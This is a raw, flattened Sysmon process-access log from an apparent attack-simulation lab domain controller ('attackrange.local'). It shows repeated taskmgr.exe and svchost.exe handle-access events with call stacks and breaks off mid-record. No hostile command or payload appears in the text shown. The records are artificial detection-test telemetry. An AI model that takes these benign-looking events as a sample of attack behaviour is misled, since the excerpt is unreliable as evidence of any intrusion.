21:34:49.832{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205027Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.832{29E67E80-7CBF-6019-0C00-00000000A301}588940C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-3000-00000000A301}2448C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205026Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+2a948|C:\Windows\system32\taskmgr.exe+2a9b0|C:\Windows\system32\taskmgr.exe+1a471|C:\Windows\system32\taskmgr.exe+19ea8|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205025Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-8500-6019-5005-00000000A301}5804C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205024Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205023Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205022Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205021Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205020Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+2a948|C:\Windows\system32\taskmgr.exe+2a9b0|C:\Windows\system32\taskmgr.exe+1a471|C:\Windows\system32\taskmgr.exe+19ea8|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205019Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205018Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3905-00000000A301}2800C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205017Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3905-00000000A301}2800C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205016Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3905-00000000A301}2800C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205015Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.817{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3905-00000000A301}2800C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205014Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3605-00000000A301}1088C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205013Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3605-00000000A301}1088C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205012Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3605-00000000A301}1088C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205011Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3605-00000000A301}1088C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205010Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F6-6019-3605-00000000A301}1088C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205009Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-3005-00000000A301}4352C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205008Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-3005-00000000A301}4352C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205007Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-3005-00000000A301}4352C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205006Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-3005-00000000A301}4352C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205005Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2D05-00000000A301}4936C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205004Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2D05-00000000A301}4936C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205003Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2D05-00000000A301}4936C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205002Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2D05-00000000A301}4936C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205001Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2C05-00000000A301}1928C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205000Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-84F4-6019-2C05-00000000A301}1928C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204999Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D72-6019-E700-00000000A301}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+19544|C:\Windows\system32\taskmgr.exe+1a290|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204998Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D72-6019-E700-00000000A301}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+1e590|C:\Windows\system32\taskmgr.exe+1a25e|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204997Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D72-6019-E700-00000000A301}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+1ea6a|C:\Windows\system32\taskmgr.exe+1a0d0|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204996Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D72-6019-E700-00000000A301}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b1cf|C:\Windows\system32\taskmgr.exe+1a084|C:\Windows\system32\taskmgr.exe+19e20|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204995Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D72-6019-E700-00000000A301}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\taskmgr.exe+b3bc|C:\Windows\system32\taskmgr.exe+b2b8|C:\Windows\system32\taskmgr.exe+19d0d|C:\Windows\system32\taskmgr.exe+1cc42|C:\Windows\system32\taskmgr.exe+14fa9|C:\Windows\system32\taskmgr.exe+2cdd3|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204994Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 21:34:49.801{29E67E80-16F9-601B-3D38-00000000A301}44006212C:\Windows\system32\taskmgr.exe{29E67E80-7D6C-6019-DE00-00000000A301}4008C:\Program 